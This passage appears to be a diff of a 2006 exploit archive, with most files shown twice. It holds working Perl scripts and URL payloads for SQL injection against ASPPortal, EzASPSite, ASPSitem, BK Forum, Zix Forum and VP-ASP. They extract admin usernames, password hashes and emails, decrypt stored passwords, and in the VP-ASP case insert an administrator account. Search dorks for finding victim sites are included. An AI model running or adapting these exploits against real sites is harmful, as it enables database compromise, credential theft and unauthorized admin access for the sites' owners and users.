print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /<p>(.*?)<\/p>/) {
|
||||
print "- Password: $1\r\n";
|
||||
print "- Lets go $bphost$bpdir$bpfinal for admin login.\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of BetaParticle is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-18]
|
||||
|
|
|
@ -1,87 +1,87 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=21
|
||||
#Usage: aspp.pl <host> <path> <user>
|
||||
use IO::Socket;
|
||||
use Math::BigInt;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
|
||||
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
|
||||
print "- <user> -> Username that you want password. ex: admin\r\n";
|
||||
exit();
|
||||
}
|
||||
sub decrypt ()
|
||||
{
|
||||
$lp = length($appass);
|
||||
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
|
||||
if ($lp == 0) { die("- An error occurued\r\n"); }
|
||||
for ($i = 0; $i < $lp ; $i++) {
|
||||
$f = $lp - $i - 1; # Formula for getting character via substr...
|
||||
$n = substr($apkey,$f,1);
|
||||
$l = substr($appass,$f,1);
|
||||
$appwd = chr(ord($n)^ord($l)).$appwd;
|
||||
}
|
||||
print "- Password decrypted as: $appwd\r\n";
|
||||
print "- Lets go $aphost$apdir$apfinal for login\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$apserver = $ARGV[0];
|
||||
$apserver =~ s/(http:\/\/)//eg;
|
||||
$aphost = "http://".$apserver;
|
||||
$apdir = $ARGV[1];
|
||||
$apport = "80";
|
||||
$aptar = "content/downloads/download_click.asp?downloadid=";
|
||||
$apfinal = "content/users/login.asp";
|
||||
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
|
||||
$apreq = $aphost.$apdir.$aptar.$apxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $apserver\r\n";
|
||||
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
|
||||
print $ap "GET $apreq HTTP/1.1\n";
|
||||
print $ap "Accept: */*\n";
|
||||
print $ap "Referer: $aphost\n";
|
||||
print $ap "Accept-Language: tr\n";
|
||||
print $ap "User-Agent: NukeZilla\n";
|
||||
print $ap "Cache-Control: no-cache\n";
|
||||
print $ap "Host: $apserver\n";
|
||||
print $ap "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ap>) {
|
||||
if ($answer =~ /string: "(.*?)"]'/) {
|
||||
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
|
||||
print "- Username: $ARGV[2]\r\n";
|
||||
print "- Decrypting password....\r\n";
|
||||
$appass = $1;
|
||||
$appass =~ s/(")/chr(34)/eg;
|
||||
$appass =~ s/(<)/chr(60)/eg;
|
||||
$appass =~ s/(>)/chr(62)/eg;
|
||||
$appass =~ s/( )/chr(32)/eg;
|
||||
decrypt();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of ASPPortal is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-20]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=21
|
||||
#Usage: aspp.pl <host> <path> <user>
|
||||
use IO::Socket;
|
||||
use Math::BigInt;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-21\r\n";
|
||||
print "- ASPPortal <= 3.1.1 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path> <user>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPPortal ex: /portal/\r\n";
|
||||
print "- <user> -> Username that you want password. ex: admin\r\n";
|
||||
exit();
|
||||
}
|
||||
sub decrypt ()
|
||||
{
|
||||
$lp = length($appass);
|
||||
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;<R/8U)XFHC<SR_E\$.DLG'=I+@5%*+OP:F_=';'NSY`-^S.`AA=BJ3M0.WF#T5LGK(=/<:+C2K/^7AI\$;PU'OME2+T8ND?W\$C(J\,;631'M-LD5F%%1TF_&K2A-D-54[2P,#'*JU%6`0RF3CMF0(#T07U'FZ=>#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ<OZ6IN?7N4<GTL?(M'4S8+3JMK5]HC%^1^+K;\\$WBXPA?F&5^E\D\$7%*O/U[1/?8(5:1OVWV*1Z-%`:K&V?X1,1KURD@3W0^D)<OG40?(VJ4EWL5A5M<\$A);CQ36R9I]*U#Q%1<Y\&SA%#1<V";
|
||||
if ($lp == 0) { die("- An error occurued\r\n"); }
|
||||
for ($i = 0; $i < $lp ; $i++) {
|
||||
$f = $lp - $i - 1; # Formula for getting character via substr...
|
||||
$n = substr($apkey,$f,1);
|
||||
$l = substr($appass,$f,1);
|
||||
$appwd = chr(ord($n)^ord($l)).$appwd;
|
||||
}
|
||||
print "- Password decrypted as: $appwd\r\n";
|
||||
print "- Lets go $aphost$apdir$apfinal for login\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$apserver = $ARGV[0];
|
||||
$apserver =~ s/(http:\/\/)//eg;
|
||||
$aphost = "http://".$apserver;
|
||||
$apdir = $ARGV[1];
|
||||
$apport = "80";
|
||||
$aptar = "content/downloads/download_click.asp?downloadid=";
|
||||
$apfinal = "content/users/login.asp";
|
||||
$apxp = "-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,password+FROM+users+where+username='$ARGV[2]'";
|
||||
$apreq = $aphost.$apdir.$aptar.$apxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $apserver\r\n";
|
||||
$ap = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$apserver", PeerPort => "$apport") || die "- Connection failed...\n";
|
||||
print $ap "GET $apreq HTTP/1.1\n";
|
||||
print $ap "Accept: */*\n";
|
||||
print $ap "Referer: $aphost\n";
|
||||
print $ap "Accept-Language: tr\n";
|
||||
print $ap "User-Agent: NukeZilla\n";
|
||||
print $ap "Cache-Control: no-cache\n";
|
||||
print $ap "Host: $apserver\n";
|
||||
print $ap "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ap>) {
|
||||
if ($answer =~ /string: "(.*?)"]'/) {
|
||||
print "- Exploit succeed! Getting $ARGV[2]'s information\r\n";
|
||||
print "- Username: $ARGV[2]\r\n";
|
||||
print "- Decrypting password....\r\n";
|
||||
$appass = $1;
|
||||
$appass =~ s/(")/chr(34)/eg;
|
||||
$appass =~ s/(<)/chr(60)/eg;
|
||||
$appass =~ s/(>)/chr(62)/eg;
|
||||
$appass =~ s/( )/chr(32)/eg;
|
||||
decrypt();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of ASPPortal is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# milw0rm.com [2006-03-20]
|
||||
|
|
|
@ -1,69 +1,69 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=22
|
||||
#Usage: ezasp.pl <host> <path>
|
||||
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
|
||||
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$ezserver = $ARGV[0];
|
||||
$ezserver =~ s/(http:\/\/)//eg;
|
||||
$ezhost = "http://".$ezserver;
|
||||
$ezdir = $ARGV[1];
|
||||
$ezport = "80";
|
||||
$eztar = "Default.asp?Scheme=";
|
||||
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
|
||||
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $ezserver\r\n";
|
||||
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
|
||||
print $ez "GET $ezreq HTTP/1.1\n";
|
||||
print $ez "Accept: */*\n";
|
||||
print $ez "Referer: $ezhost\n";
|
||||
print $ez "Accept-Language: tr\n";
|
||||
print $ez "User-Agent: NukeZilla\n";
|
||||
print $ez "Cache-Control: no-cache\n";
|
||||
print $ez "Host: $ezserver\n";
|
||||
print $ez "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ez>) {
|
||||
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- USERNAME: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
|
||||
print "- SHA1 HASH of PASSWORD: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of EzASPSite is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# nukedx.com [2006-03-29]
|
||||
|
||||
# milw0rm.com [2006-03-29]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=22
|
||||
#Usage: ezasp.pl <host> <path>
|
||||
#googledork: [ "Powered By EzASPSite v2.0 RC3" ] 62.400 Pages..
|
||||
use IO::Socket;
|
||||
if(@ARGV != 2) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-22\r\n";
|
||||
print "- EzASPSite <= 2.0 RC3 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to EzASPSite ex: /ezasp/\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$ezserver = $ARGV[0];
|
||||
$ezserver =~ s/(http:\/\/)//eg;
|
||||
$ezhost = "http://".$ezserver;
|
||||
$ezdir = $ARGV[1];
|
||||
$ezport = "80";
|
||||
$eztar = "Default.asp?Scheme=";
|
||||
$ezxp = "-1+UNION+SELECT+0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,'NWPX',0,0,0,0,0,0,0+from+tblAuthor+where+Group_ID=1";
|
||||
$ezreq = $ezhost.$ezdir.$eztar.$ezxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $ezserver\r\n";
|
||||
$ez = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$ezserver", PeerPort => "$ezport") || die "- Connection failed...\n";
|
||||
print $ez "GET $ezreq HTTP/1.1\n";
|
||||
print $ez "Accept: */*\n";
|
||||
print $ez "Referer: $ezhost\n";
|
||||
print $ez "Accept-Language: tr\n";
|
||||
print $ez "User-Agent: NukeZilla\n";
|
||||
print $ez "Cache-Control: no-cache\n";
|
||||
print $ez "Host: $ezserver\n";
|
||||
print $ez "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$ez>) {
|
||||
if ($answer =~ /<link href=\"forum\/(.*?)\" rel=\"stylesheet\"/) {
|
||||
print "- Exploit succeed! Getting admin's information\r\n";
|
||||
print "- USERNAME: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /bgcolor=\"NWPX\" background=\"forum\/(.*?)\">/) {
|
||||
print "- SHA1 HASH of PASSWORD: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
if ($answer =~ /number of columns/) {
|
||||
print "- This version of EzASPSite is vulnerable too\r\n";
|
||||
print "- but default query of SQL-Inj. does not work on it\r\n";
|
||||
print "- So please edit query by manually adding null data..\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
# nukedx.com [2006-03-29]
|
||||
|
||||
# milw0rm.com [2006-03-29]
|
||||
|
|
|
@ -1,77 +1,77 @@
|
|||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=23
|
||||
#Usage: aspsi.pl <host> <path> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
|
||||
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
|
||||
print "- <userid> -> ID of user that you want info ex: 1\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$asserver = $ARGV[0];
|
||||
$asserver =~ s/(http:\/\/)//eg;
|
||||
$ashost = "http://".$asserver;
|
||||
$asdir = $ARGV[1];
|
||||
$asport = "80";
|
||||
$astar = "Haberler.asp?haber=devam&id=";
|
||||
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
|
||||
$asreq = $ashost.$asdir.$astar.$asxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $asserver\r\n";
|
||||
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
|
||||
print $as "GET $asreq HTTP/1.1\n";
|
||||
print $as "Accept: */*\n";
|
||||
print $as "Referer: $ashost\n";
|
||||
print $as "Accept-Language: tr\n";
|
||||
print $as "User-Agent: NukeZilla\n";
|
||||
print $as "Cache-Control: no-cache\n";
|
||||
print $as "Host: $asserver\n";
|
||||
print $as "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$as>) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($1 == $ARGV[2]) {
|
||||
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
|
||||
}
|
||||
else { die "- Exploit failed\n"; }
|
||||
}
|
||||
if ($answer =~ /\" align=\"left\">(.*?)</) {
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /Ekleyen \(<b>(.*?)<\/b>\)/) {
|
||||
print "- MD5 HASH of PASSWORD: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /\| (.*?) ]<br>/) {
|
||||
print "- Regdate: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
|
||||
print "- Email: $1\r\n";
|
||||
}
|
||||
if ($answer =~ / Okunma : (.*?) /) {
|
||||
print "- MD5 hash of answer: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
#nukedx.com [2006-04-19]
|
||||
|
||||
# milw0rm.com [2006-04-19]
|
||||
#!/usr/bin/perl
|
||||
#Method found & Exploit scripted by nukedx
|
||||
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
|
||||
#Original advisory: http://www.nukedx.com/?viewdoc=23
|
||||
#Usage: aspsi.pl <host> <path> <userid>
|
||||
use IO::Socket;
|
||||
if(@ARGV != 3) { usage(); }
|
||||
else { exploit(); }
|
||||
sub header()
|
||||
{
|
||||
print "\n- NukedX Security Advisory Nr.2006-23\r\n";
|
||||
print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n";
|
||||
}
|
||||
sub usage()
|
||||
{
|
||||
header();
|
||||
print "- Usage: $0 <host> <path>\r\n";
|
||||
print "- <host> -> Victim's host ex: www.victim.com\r\n";
|
||||
print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n";
|
||||
print "- <userid> -> ID of user that you want info ex: 1\r\n";
|
||||
exit();
|
||||
}
|
||||
sub exploit ()
|
||||
{
|
||||
#Our variables...
|
||||
$asserver = $ARGV[0];
|
||||
$asserver =~ s/(http:\/\/)//eg;
|
||||
$ashost = "http://".$asserver;
|
||||
$asdir = $ARGV[1];
|
||||
$asport = "80";
|
||||
$astar = "Haberler.asp?haber=devam&id=";
|
||||
$asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2];
|
||||
$asreq = $ashost.$asdir.$astar.$asxp;
|
||||
#Sending data...
|
||||
header();
|
||||
print "- Trying to connect: $asserver\r\n";
|
||||
$as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n";
|
||||
print $as "GET $asreq HTTP/1.1\n";
|
||||
print $as "Accept: */*\n";
|
||||
print $as "Referer: $ashost\n";
|
||||
print $as "Accept-Language: tr\n";
|
||||
print $as "User-Agent: NukeZilla\n";
|
||||
print $as "Cache-Control: no-cache\n";
|
||||
print $as "Host: $asserver\n";
|
||||
print $as "Connection: close\n\n";
|
||||
print "- Connected...\r\n";
|
||||
while ($answer = <$as>) {
|
||||
if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) {
|
||||
if ($1 == $ARGV[2]) {
|
||||
print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n";
|
||||
}
|
||||
else { die "- Exploit failed\n"; }
|
||||
}
|
||||
if ($answer =~ /\" align=\"left\">(.*?)</) {
|
||||
print "- Username: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /Ekleyen \(<b>(.*?)<\/b>\)/) {
|
||||
print "- MD5 HASH of PASSWORD: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /\| (.*?) ]<br>/) {
|
||||
print "- Regdate: $1\r\n";
|
||||
}
|
||||
if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) {
|
||||
print "- Email: $1\r\n";
|
||||
}
|
||||
if ($answer =~ / Okunma : (.*?) /) {
|
||||
print "- MD5 hash of answer: $1\r\n";
|
||||
exit();
|
||||
}
|
||||
}
|
||||
#Exploit failed...
|
||||
print "- Exploit failed\n"
|
||||
}
|
||||
|
||||
#nukedx.com [2006-04-19]
|
||||
|
||||
# milw0rm.com [2006-04-19]
|
||||
|
|
|
@ -1,18 +1,18 @@
|
|||
# BK Forum <= 4.0 Remote SQL Injection
|
||||
# by n0m3rcy
|
||||
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
|
||||
# Exploit:
|
||||
|
||||
First you must be logged in
|
||||
Then type this in your browser
|
||||
|
||||
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
|
||||
|
||||
You will find admin's password
|
||||
|
||||
# Shoutz:
|
||||
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
|
||||
|
||||
# Have phun!
|
||||
|
||||
# milw0rm.com [2006-04-24]
|
||||
# BK Forum <= 4.0 Remote SQL Injection
|
||||
# by n0m3rcy
|
||||
# Copyright (c) 2006 n0m3rcy <n0m3rcy@bsdmail.org>
|
||||
# Exploit:
|
||||
|
||||
First you must be logged in
|
||||
Then type this in your browser
|
||||
|
||||
http://www.site.com/path/member.asp?id=-1%20UNION%20SELECT%201,memName,3,4,5,6,7,8,9,10,11,memPassword,13,14,15,16%20FROM%20member+where+memID=1
|
||||
|
||||
You will find admin's password
|
||||
|
||||
# Shoutz:
|
||||
nukedx , nukedx , nukedx :) , cijfer , str0ke , Devil-00
|
||||
|
||||
# Have phun!
|
||||
|
||||
# milw0rm.com [2006-04-24]
|
||||
|
|
|
@ -1,30 +1,30 @@
|
|||
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
|
||||
|
||||
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
|
||||
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
|
||||
well it didn't take me more then 5 minutes to find a bug in vp-asp.
|
||||
|
||||
* the vendor was already notified.
|
||||
|
||||
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
|
||||
taken by people using the information in this document, if you don't agree please stop reading
|
||||
and close this text document asap.
|
||||
|
||||
* this information is for educational purposes only!
|
||||
|
||||
----
|
||||
|
||||
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
|
||||
|
||||
quick hack to add user a/a:
|
||||
|
||||
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
|
||||
|
||||
and for those of you that don't know sql at all
|
||||
this is how you remove the user 'a':
|
||||
|
||||
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
|
||||
|
||||
-tracewar
|
||||
|
||||
# milw0rm.com [2006-05-06]
|
||||
VP-ASP 6.00 SQL Injection / Exploit by tracewar(tracewar@gmail.com)
|
||||
|
||||
people claimed there is some underground sploit for vp-asp 6.00 and I was sure that
|
||||
if a sploit really exist in the ug i can find the bug and make a small hack for it ^^
|
||||
well it didn't take me more then 5 minutes to find a bug in vp-asp.
|
||||
|
||||
* the vendor was already notified.
|
||||
|
||||
p.s. before we get to the bug/hack.. I'm not responsible for any illegal actions
|
||||
taken by people using the information in this document, if you don't agree please stop reading
|
||||
and close this text document asap.
|
||||
|
||||
* this information is for educational purposes only!
|
||||
|
||||
----
|
||||
|
||||
The SQL Injection bug is in the shopcurrency.asp file under the "cid" query.
|
||||
|
||||
quick hack to add user a/a:
|
||||
|
||||
/shopcurrency.asp?cid=AUD';insert into tbluser ("fldusername","fldpassword","fldaccess") values ('a','a','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29')--
|
||||
|
||||
and for those of you that don't know sql at all
|
||||
this is how you remove the user 'a':
|
||||
|
||||
/shopcurrency.asp?cid=AUD';delete from tbluser where fldusername='a'--
|
||||
|
||||
-tracewar
|
||||
|
||||
# milw0rm.com [2006-05-06]
|
||||
|
|
|
@ -1,21 +1,21 @@
|
|||
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
|
||||
|
||||
|
||||
Vulnerability:
|
||||
--------------------
|
||||
SQL_Injection:
|
||||
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
|
||||
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
|
||||
Successful exploitation extracts username and password of administrator in clear text .
|
||||
|
||||
|
||||
Proof of Concepts:
|
||||
--------------------
|
||||
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
|
||||
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
|
||||
|
||||
-------
|
||||
|
||||
By FarhadKey On 19 May 2006
|
||||
|
||||
# milw0rm.com [2006-05-19]
|
||||
Zix Forum <= 1.12 (layid) SQL Injection Vulnerability
|
||||
|
||||
|
||||
Vulnerability:
|
||||
--------------------
|
||||
SQL_Injection:
|
||||
Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.
|
||||
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
|
||||
Successful exploitation extracts username and password of administrator in clear text .
|
||||
|
||||
|
||||
Proof of Concepts:
|
||||
--------------------
|
||||
site.com/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
|
||||
site.com/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
|
||||
|
||||
-------
|
||||
|
||||
By FarhadKey On 19 May 2006
|
||||
|
||||
# milw0rm.com [2006-05-19]
|
||||
|
|
|
@ -1,11 +1,11 @@
|
|||
# Title : qjForum(member.asp) SQL Injection Vulnerability
|
||||
# Author : ajann
|
||||
# greetz : Nukedx,TheHacker
|
||||
# Dork : "qjForum"
|
||||
# Exploit:
|
||||
|
||||
# Login before injection.
|
||||
|
||||
